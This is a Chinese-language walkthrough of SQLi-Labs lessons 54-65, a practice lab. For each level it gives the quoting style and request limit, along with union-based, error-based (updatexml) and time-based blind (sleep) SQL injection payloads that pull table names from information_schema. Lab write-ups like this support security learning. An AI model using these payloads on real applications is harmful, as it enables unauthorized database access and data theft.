Less_54
Less-54:使用’’包裹
对输入的次数做了限制,必须在10次请求之内获取信息,否则会刷新表名
输入:?Id=1’ order by 3--+ 查看有多少列;
输入 ?id=-1' union select 1,2,3 --+ 查看回显位置;
输入 ?id=-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+ 查看表名;
下面操作和less1基本一致。
Less_55
Less55: 使用()包裹
对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名;
其他操作与第54关基本一致。
Less_56
Less56:使用('’)包裹
对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名;
其他操作与第54关基本一致。
Less_57
Less57:使用””包裹
对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名;
其他操作与第54关基本一致。
Less_58
Less58:使用’’包裹
对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名;
输入 ?id=-1' union select 1,2,3 --+ 并没有显示回显的位置;
所以我们不能使用union select联合查询,我们使用报错注入;
输入 ?id=-1'andupdatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+ 查表名;
接下来步骤与less1基本一致。
Less_59
Less59:无包裹
对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名;
输入?id=-1 union select 1,2,3 --+ 依旧没有回显位置;
所以同58关相同,使用报错注入。
Less_60
Less60:使用(“”)包裹
对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名;
采用报错注入与第58关基本一致
Less_61
Less61:使用((‘’))包裹
对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名;
采用报错注入与第58关基本一致
Less_62
Less62:使用(‘’)包裹
对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名;
使用时间盲注
输入 ?id=1') and if((length(database())=1),1,sleep(5))--+ 判断数据库的长度;
输入 ?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 's' ,1, sleep(5)) --+ 判断数据库字母是否比s大;
less_63
Less63:使用‘’包裹
对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名;
使用时间盲注,其他操作与第62关基本一致。
less_64
Less64:使用(())包裹
对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名;
使用时间盲注,其他操作与第62关基本一致。
Less_65
Less65:使用(“”)包裹
对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名;
使用时间盲注,其他操作与第62关基本一致。
